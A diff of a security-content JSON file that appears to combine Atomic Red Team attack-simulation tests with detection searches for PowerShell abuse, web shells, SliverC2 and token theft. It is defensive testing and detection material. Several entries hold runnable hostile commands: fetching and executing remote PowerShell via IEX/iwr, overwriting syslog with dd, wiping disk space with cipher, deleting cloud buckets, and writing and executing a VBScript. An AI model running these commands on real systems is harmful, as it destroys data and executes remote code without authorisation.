"CopyKittens", + "DarkHydrus", + "Deep Panda", + "Gamaredon Group", + "Gorgon Group", + "Higaisa", + "Kimsuky", + "Magic Hound", + "Nomadic Octopus" + ] + } + ] + } } ], "external_reference": [ @@ -580123,7 +586004,7 @@ } ], "command_list": [ - "reg.exe import \\T1546.010\\src\\T1546.010.reg\n" + "reg.exe import \"\\T1546.010\\src\\T1546.010.reg\"\n" ], "commands": [], "queries": [], @@ -580158,8 +586039,8 @@ "dependencies": [ { "description": "Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file})\n", - "prereq_command": "if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg\" -OutFile \"#{registry_file}\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg\" -OutFile \"#{registry_cleanup_file}\"\n" + "prereq_command": "if ((Test-Path \"#{registry_file}\") -and (Test-Path \"#{registry_cleanup_file}\")) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path \"#{registry_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg\" -OutFile \"#{registry_file}\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg\" -OutFile \"#{registry_cleanup_file}\"\n" }, { "description": "DLL's must exist in the C:\\Tools directory (T1546.010.dll and T1546.010x86.dll)\n", @@ -580168,8 +586049,8 @@ } ], "executor": { - "command": "reg.exe import #{registry_file}\n", - "cleanup_command": "reg.exe import #{registry_cleanup_file} >nul 2>&1\n", + "command": "reg.exe import \"#{registry_file}\"\n", + "cleanup_command": "reg.exe import \"#{registry_cleanup_file}\" >nul 2>&1\n", "name": "command_prompt", "elevation_required": true } @@ -587334,7 +593215,7 @@ { "name": "Malicious Powershell Executed As A Service", "description": "This detection is to identify the abuse the Windows SC.exe to execute malicious commands or payloads via PowerShell.", - "search": " `wineventlog_system` EventCode=7045 | eval l_Service_File_Name=lower(Service_File_Name) | regex l_Service_File_Name=\"powershell[.\\s]|powershell_ise[.\\s]|pwsh[.\\s]|psexec[.\\s]\" | regex l_Service_File_Name=\"-nop[rofile\\s]+|-w[indowstyle]*\\s+hid[den]*|-noe[xit\\s]+|-enc[odedcommand\\s]+\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Service_File_Name Service_Name Service_Start_Type Service_Type Service_Account user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_executed_as_a_service_filter`", + "search": " `wineventlog_system` EventCode=7045 | eval l_Service_File_Name=lower(Service_File_Name) | regex l_Service_File_Name=\"powershell[.\\s]|powershell_ise[.\\s]|pwsh[.\\s]|psexec[.\\s]\" | regex l_Service_File_Name=\"-nop[rofile\\s]+|-w[indowstyle]*\\s+hid[den]*|-noe[xit\\s]+|-enc[odedcommand\\s]+\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Service_File_Name Service_Name Service_Start_Type Service_Type Service_Account user dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_executed_as_a_service_filter`", "tags": { "name": "Malicious Powershell Executed As A Service", "analytic_story": [ @@ -587410,7 +593291,7 @@ { "name": "Windows Service Create SliverC2", "description": "When an adversary utilizes SliverC2 to laterally move with the Psexec module, it will create a service with the name and description of \"Sliver\" and \"Sliver Implant\". Note that these may be easily changed and are specific to only SliverC2. We have also created the same regex as Microsoft has outlined to attempt to capture the suspicious service path (regex101 reference).", - "search": "`wineventlog_system` EventCode=7045 ServiceName=\"sliver\" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_service_create_sliverc2_filter`", + "search": "`wineventlog_system` EventCode=7045 ServiceName=\"sliver\" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_service_create_sliverc2_filter`", "tags": { "name": "Windows Service Create SliverC2", "analytic_story": [ @@ -587423,7 +593304,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "A user mode service was created on $ComputerName$ related to SliverC2.", + "message": "A user mode service was created on $dest$ related to SliverC2.", "mitre_attack_id": [ "T1569", "T1569.002" @@ -587433,7 +593314,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -587487,7 +593368,8 @@ "Active Directory Lateral Movement", "Brute Ratel C4", "Qakbot", - "Snake Malware" + "Snake Malware", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -587678,11 +593560,12 @@ } ], "command_list": [ - "Start-Process \\..\\ExternalPayloads\\T1059.003_script.bat\n", + "Start-Process \"\\..\\ExternalPayloads\\T1059.003_script.bat\"\n", "echo \"Hello from the Windows Command Prompt!\" > \"%TEMP%\\test.bin\" & type \"%TEMP%\\test.bin\"\n", "%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt\n", "cmd /c \"for /l %x in (1,1,75) do start wordpad.exe /p \\..\\ExternalPayloads\\T1059_003note.txt\" | out-null\n", - "cmd /r cmd<\\T1059.003\\src\\t1059.003_cmd.cmd\n" + "cmd /r cmd<\"\\T1059.003\\src\\t1059.003_cmd.cmd\"\n", + " c:\\windows\\system32\\cmd.exe /c cd /d %TEMP%\\ & echo Set objShell = CreateObject(\"WScript.Shell\"):Set objExec = objShell.Exec(\"whoami\"):Set objExec = Nothing:Set objShell = Nothing > AtomicTest.vbs & AtomicTest.vbs" ], "commands": [], "queries": [], @@ -587717,13 +593600,13 @@ "dependencies": [ { "description": "Batch file must exist on disk at specified location (#{script_path})\n", - "prereq_command": "if (Test-Path #{script_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item #{script_path} -Force | Out-Null\nSet-Content -Path #{script_path} -Value \"#{command_to_execute}\"\n" + "prereq_command": "if (Test-Path \"#{script_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item \"#{script_path}\" -Force | Out-Null\nSet-Content -Path \"#{script_path}\" -Value \"#{command_to_execute}\"\n" } ], "executor": { - "command": "Start-Process #{script_path}\n", - "cleanup_command": "Remove-Item #{script_path} -Force -ErrorAction Ignore\n", + "command": "Start-Process \"#{script_path}\"\n", + "cleanup_command": "Remove-Item \"#{script_path}\" -Force -ErrorAction Ignore\n", "name": "powershell" } }, @@ -587800,7 +593683,7 @@ { "description": "File to print must exist on disk at specified location (#{file_to_print})\n", "prereq_command": "if (test-path \"#{file_to_print}\"){exit 0} else {exit 1}\n", - "get_prereq_command": "new-item #{file_to_print} -value \"This file has been created by T1059.003 Test 4\" -Force | Out-Null\n" + "get_prereq_command": "new-item \"#{file_to_print}\" -value \"This file has been created by T1059.003 Test 4\" -Force | Out-Null\n" } ], "executor": { @@ -587827,15 +593710,40 @@ "dependencies": [ { "description": "CMD file must exist on disk at specified location (#{input_file})\n", - "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1059.003/src/t1059.003_cmd.cmd\" -OutFile \"#{input_file}\"\n" + "prereq_command": "if (Test-Path \"#{input_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{input_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1059.003/src/t1059.003_cmd.cmd\" -OutFile \"#{input_file}\"\n" } ], "executor": { - "command": "cmd /r cmd<#{input_file}\n", + "command": "cmd /r cmd<\"#{input_file}\"\n", "name": "command_prompt", "elevation_required": false } + }, + { + "name": "Command prompt writing script to file then executes it", + "description": " Simulate DarkGate malware's second stage by writing a VBscript to disk directly from the command prompt then executing it.\n The script will execute 'whoami' then exit.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "script_path": { + "description": "Path in which the script will be written.", + "type": "path", + "default": "%TEMP%\\" + }, + "script_name": { + "description": "Script name (without the extension)", + "type": "string", + "default": "AtomicTest" + } + }, + "executor": { + "command": " c:\\windows\\system32\\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject(\"WScript.Shell\"):Set objExec = objShell.Exec(\"whoami\"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs", + "cleanup_command": "del \"#{script_name}.vbs\" >nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } } ] } @@ -588325,7 +594233,8 @@ "Data Destruction", "Living Off The Land", "Azorult", - "Data Destruction" + "Data Destruction", + "Warzone RAT" ], "asset_type": "Endpoint", "automated_detection_testing": "passed", @@ -588456,7 +594365,7 @@ { "name": "CMD Echo Pipe - Escalation", "description": "This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\\\.\\Pipe\\5erg53`.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter`", "tags": { "name": "CMD Echo Pipe - Escalation", "analytic_story": [ @@ -593078,7 +598987,7 @@ { "name": "Detect Exchange Web Shell", "description": "The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN (\"*\\\\HttpProxy\\\\owa\\\\auth\\\\*\", \"*\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\", \"*\\\\HttpProxy\\\\OAB\\\\*\") Filesystem.file_name IN( \"*.aspx\", \"*.ashx\") by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN (\"*\\\\HttpProxy\\\\owa\\\\auth\\\\*\", \"*\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\", \"*\\\\HttpProxy\\\\OAB\\\\*\") Filesystem.file_name IN( \"*.aspx\", \"*.ashx\") by _time span=1h Filesystem.user Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter`", "tags": { "name": "Detect Exchange Web Shell", "analytic_story": [ @@ -593248,7 +599157,9 @@ "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", - "CISA AA22-264A" + "CISA AA22-264A", + "Citrix ShareFile RCE CVE-2023-24489", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -593510,7 +599421,8 @@ "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", - "CISA AA22-264A" + "CISA AA22-264A", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -593717,7 +599629,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -594930,7 +600842,7 @@ } ], "command_list": [ - "if (-not (Test-Path \\..\\ExternalPayloads\\T1485.txt)) { New-Item \\..\\ExternalPayloads\\T1485.txt -Force }\nInvoke-Expression -Command \"\\..\\ExternalPayloads\\Sdelete\\sdelete.exe -accepteula \\..\\ExternalPayloads\\T1485.txt\"\n", + "if (-not (Test-Path \"\\..\\ExternalPayloads\\T1485.txt\")) { New-Item \"\\..\\ExternalPayloads\\T1485.txt\" -Force }\n& \"\\..\\ExternalPayloads\\Sdelete\\sdelete.exe\" -accepteula \"\\..\\ExternalPayloads\\T1485.txt\"\n", "dd of=/var/log/syslog if=/dev/zero count=$(ls -l /var/log/syslog | awk '{print $5}') iflag=count_bytes\n", "cipher.exe /w:C:\n", "gcloud config set project atomic-test-1\ngcloud storage buckets delete gs://atomic-red-team-bucket\n" @@ -594946,9 +600858,9 @@ "display_name": "Data Destruction", "atomic_tests": [ { - "name": "Windows - Overwrite file with Sysinternals SDelete", + "name": "Windows - Overwrite file with SysInternals SDelete", "auto_generated_guid": "476419b5-aebf-4366-a131-ae3e8dae5fc2", - "description": "Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, \"Files deleted: 1\" will be displayed in\nthe powershell session along with other information about the file that was deleted.\n", + "description": "Overwrites and deletes a file using SysInternals SDelete. Upon successful execution, \"Files deleted: 1\" will be displayed in\nthe powershell session along with other information about the file that was deleted.\n", "supported_platforms": [ "windows" ], @@ -594967,13 +600879,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})\n", - "prereq_command": "if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/SDelete.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\SDelete.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\SDelete.zip PathToAtomicsFolder\\..\\ExternalPayloads\\Sdelete -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\SDelete.zip -Force\n" + "description": "Secure delete tool from SysInternals must exist on disk at specified location (#{sdelete_exe})\n", + "prereq_command": "if (Test-Path \"#{sdelete_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/SDelete.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\SDelete.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\SDelete.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sdelete\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\SDelete.zip\" -Force\n" } ], "executor": { - "command": "if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }\nInvoke-Expression -Command \"#{sdelete_exe} -accepteula #{file_to_delete}\"\n", + "command": "if (-not (Test-Path \"#{file_to_delete}\")) { New-Item \"#{file_to_delete}\" -Force }\n& \"#{sdelete_exe}\" -accepteula \"#{file_to_delete}\"\n", "name": "powershell" } }, @@ -595037,7 +600949,7 @@ "name": "sh", "elevation_required": false, "command": "gcloud config set project #{project_id}\ngcloud storage buckets delete gs://#{bucket_name}\n", - "cleanup_command": "cd $PathToAtomicsFolder/T1485/src/T1485-4/\nterraform state rm google_storage_bucket.bucket\nterraform destroy -auto-approve\n" + "cleanup_command": "cd \"$PathToAtomicsFolder/T1485/src/T1485-4/\"\nterraform state rm google_storage_bucket.bucket\nterraform destroy -auto-approve\n" }, "dependency_executor_name": "sh", "dependencies": [ @@ -595058,8 +600970,8 @@ }, { "description": "Create dependency resources using terraform\n", - "prereq_command": "stat $PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate\n", - "get_prereq_command": "cd $PathToAtomicsFolder/T1485/src/T1485-4/\nterraform init\nterraform apply -auto-approve" + "prereq_command": "stat \"$PathToAtomicsFolder/T1485/src/T1485-4/terraform.tfstate\"\n", + "get_prereq_command": "cd \"$PathToAtomicsFolder/T1485/src/T1485-4/\"\nterraform init\nterraform apply -auto-approve" } ] } @@ -595708,41 +601620,6 @@ "role": [ "Victim" ] - }, - { - "name": "file_name", - "type": "File Name", - "role": [ - "Victim" - ] - }, - { - "name": "file_count", - "type": "Other", - "role": [ - "Other" - ] - }, - { - "name": "path_count", - "type": "Other", - "role": [ - "Other" - ] - }, - { - "name": "file_extension", - "type": "Other", - "role": [ - "Other" - ] - }, - { - "name": "Name", - "type": "Other", - "role": [ - "Other" - ] } ], "risk_score": 90, @@ -597130,7 +603007,7 @@ "kill_chain_phases": [ "Actions on Objectives" ], - "message": "A process $process_name$ was identified attempting to disable memory crash dumps on $dest$.", + "message": "A process was identified attempting to disable memory crash dumps on $dest$.", "mitre_attack_id": [ "T1485" ], @@ -597151,20 +603028,6 @@ "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 90, @@ -598710,7 +604573,7 @@ "kill_chain_phases": [ "Actions on Objectives" ], - "message": "Potential AWS EC2 Exfiltration detected on account id - $aws_account_id$ by user $user_arn$ from src_ip $src_ip$", + "message": "Potential AWS EC2 Exfiltration detected on account id - $aws_account_id$ by user $userName$ from src_ip $src_ip$", "mitre_attack_id": [ "T1537" ], @@ -598719,7 +604582,7 @@ ], "observable": [ { - "name": "user_arn", + "name": "userName", "type": "User", "role": [ "Attacker" @@ -598977,7 +604840,7 @@ } ], "command_list": [ - "PathToAtomicsFolder\\T1027.006\\bin\\T1027_006_remote.html\n" + "& \"PathToAtomicsFolder\\T1027.006\\bin\\T1027_006_remote.html\"\n" ], "commands": [], "queries": [], @@ -598999,13 +604862,13 @@ "dependencies": [ { "description": "T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\\T1027.006\\bin\\T1027_006_Remote.html\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\T1027.006\\bin\\T1027_006_Remote.html) { exit 0} else { exit 1}\n", + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\T1027.006\\bin\\T1027_006_Remote.html\") { exit 0} else { exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\T1027.006\\bin\\\" -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html\" -OutFile \"PathToAtomicsFolder\\T1027.006\\bin\\T1027_006_Remote.html\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\T1027.006\\bin\\T1027_006_remote.html\n", - "cleanup_command": "$user = [System.Environment]::UserName; Remove-Item -Path C:\\Users\\$user\\Downloads\\FeelTheBurn.iso", + "command": "& \"PathToAtomicsFolder\\T1027.006\\bin\\T1027_006_remote.html\"\n", + "cleanup_command": "$user = [System.Environment]::UserName; Remove-Item -Path C:\\Users\\$user\\Downloads\\FeelTheBurn.iso -ErrorAction Ignore", "name": "powershell", "elevation_required": false } @@ -603587,7 +609450,7 @@ ], "observable": [ { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -606157,7 +612020,7 @@ } ], "command_list": [ - "start \\T1221\\src\\Calculator.docx\n" + "start \"\\T1221\\src\\Calculator.docx\"\n" ], "commands": [], "queries": [], @@ -606192,7 +612055,7 @@ } ], "executor": { - "command": "start #{docx_file}\n", + "command": "start \"#{docx_file}\"\n", "name": "command_prompt" } } @@ -609481,7 +615344,7 @@ { "name": "Windows Access Token Winlogon Duplicate Handle In Uncommon Path", "description": "The following analytic identifies a process requesting access in winlogon.exe to duplicate its handle with a non-common or public process source path. This technique was seen where adversaries attempt to gain privileges to their process. This duplicate handle access technique, may refer to a malicious process duplicating the process token of winlogon.exe and using it to a new process instance. Winlogon.exe is the common targeted process of this technique because it contains high privileges and security tokens.", - "search": "`sysmon` EventCode=10 TargetImage IN(\"*\\\\system32\\\\winlogon.exe*\", \"*\\\\SysWOW64\\\\winlogon.exe*\") AND GrantedAccess = 0x1040 AND NOT (SourceImage IN(\"C:\\\\Windows\\\\*\", \"C:\\\\Program File*\", \"%systemroot%\\\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by SourceImage TargetImage SourceProcessGUID TargetProcessGUID SourceProcessId TargetProcessId GrantedAccess CallTrace | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_winlogon_duplicate_handle_in_uncommon_path_filter`", + "search": "`sysmon` EventCode=10 TargetImage IN(\"*\\\\system32\\\\winlogon.exe*\", \"*\\\\SysWOW64\\\\winlogon.exe*\") AND GrantedAccess = 0x1040 AND NOT (SourceImage IN(\"C:\\\\Windows\\\\*\", \"C:\\\\Program File*\", \"%systemroot%\\\\*\")) | stats count min(_time) as firstTime max(_time) as lastTime by Computer SourceImage TargetImage SourceProcessGUID TargetProcessGUID SourceProcessId TargetProcessId GrantedAccess CallTrace | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_access_token_winlogon_duplicate_handle_in_uncommon_path_filter`", "tags": { "name": "Windows Access Token Winlogon Duplicate Handle In Uncommon Path", "analytic_story": [ @@ -609494,7 +615357,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "a process $SourceImage$ is duplicating the handle token of winlogon.exe in $Computer$", + "message": "A process $SourceImage$ is duplicating the handle token of winlogon.exe on $dest$", "mitre_attack_id": [ "T1134.001", "T1134" @@ -609504,7 +615367,7 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -611202,7 +617065,7 @@ { "description": "Curl must be installed on system \n", "prereq_command": "if (Test-Path #{curl_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip\" -Outfile PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\nExpand-Archive -Path PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip -DestinationPath PathToAtomicsFolder\\..\\ExternalPayloads\\curl\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl\\curl-7.71.1-win32-mingw\\bin\\curl.exe #{curl_path}\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip\" -Outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\"\nExpand-Archive -Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\"\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\\curl-7.71.1-win32-mingw\\bin\\curl.exe\" #{curl_path}\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl\"\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\curl.zip\"\n" } ], "executor": { @@ -612061,7 +617924,7 @@ } ], "command_list": [ - "cscript \\T1059.005\\src\\sys_info.vbs > $env:TEMP\\T1059.005.out.txt", + "cscript \"\\T1059.005\\src\\sys_info.vbs\" > $env:TEMP\\T1059.005.out.txt\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Exec\"\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n" ], @@ -612093,12 +617956,12 @@ "dependencies": [ { "description": "Sample script must exist on disk at specified location (#{vbscript})", - "prereq_command": "if (Test-Path #{vbscript}) {exit 0} else {exit 1} ", - "get_prereq_command": "New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs\" -OutFile \"#{vbscript}\"" + "prereq_command": "if (Test-Path \"#{vbscript}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path \"#{vbscript}\") -Force | Out-Null\nInvoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs\" -OutFile \"#{vbscript}\"" } ], "executor": { - "command": "cscript #{vbscript} > $env:TEMP\\T1059.005.out.txt", + "command": "cscript \"#{vbscript}\" > $env:TEMP\\T1059.005.out.txt\n", "cleanup_command": "Remove-Item $env:TEMP\\T1059.005.out.txt -ErrorAction Ignore", "name": "powershell" } @@ -616083,14 +621946,7 @@ ], "observable": [ { - "name": "ActorIpAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] - }, - { - "name": "Actor.ID", + "name": "UserId", "type": "User", "role": [ "Attacker" @@ -616134,8 +621990,8 @@ }, { "name": "O365 Added Service Principal", - "description": "This search detects the creation of a new Federation setting by alerting about an specific event related to its creation.", - "search": "`o365_management_activity` Workload=AzureActiveDirectory Operation=\"Add service principal credentials.\" | stats min(_time) as firstTime max(_time) as lastTime values(Actor{}.ID) as Actor.ID values(ModifiedProperties{}.Name) as ModifiedProperties.Name values(ModifiedProperties{}.NewValue) as ModifiedProperties.NewValue values(Target{}.ID) as Target.ID by ActorIpAddress Operation | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `o365_added_service_principal_filter`", + "description": "The following analytic detects addition of new service principal accounts added to O365 tenants. Attackers can abuse service principals in Office 365 (now known as Microsoft 365) to gain unauthorized access and perform malicious actions within an organization's environment. Service principals are essentially non-human accounts used by applications, services, or scripts to access resources and interact with APIs on behalf of the organization.", + "search": "`o365_management_activity` Workload=AzureActiveDirectory Operation=\"*Add service principal*\" OR (Operation = \"*principal*\" AND action = \"created\") | stats count values(ModifiedProperties{}.NewValue) as new_value by src_user src_user_type action Operation authentication_service Workload | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_added_service_principal_filter`", "tags": { "name": "O365 Added Service Principal", "analytic_story": [ @@ -616149,7 +622005,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "User $Actor.ID$ created a new federation setting on $Target.ID$ and added service principal credentials from IP Address $ActorIpAddress$", + "message": "User $src_user$ has created new service principal $new_value$ in AzureActiveDirectory", "mitre_attack_id": [ "T1136.003", 